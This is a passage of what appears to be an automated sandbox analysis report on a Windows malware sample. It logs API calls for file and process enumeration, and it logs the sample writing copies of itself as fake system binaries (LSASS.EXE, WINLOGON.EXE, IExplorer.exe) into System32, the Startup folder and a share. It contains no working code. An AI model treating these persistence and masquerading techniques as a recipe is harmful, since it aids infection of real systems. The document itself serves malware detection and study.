\"FindNextFileW\" with parameter CSC (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"348\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"388\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"396\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"452\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"488\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"504\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"624\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"700\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"788\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"840\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"868\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"908\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1252\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1276\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1332\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1500\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1516\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1580\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\smss.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46757 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46823 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 47000 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46917 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46792 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46759 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46767 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46848 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46859 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46939 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46840 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46980 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46937 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46816 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46849 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46790 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46842 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 46828 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\D3_08\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46817 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46896 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46850 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46840 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46714 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46807 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46912 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46829 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46756 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46835 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46960 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46805 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46822 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46893 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46895 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46767 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47008 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46795 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46908 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n 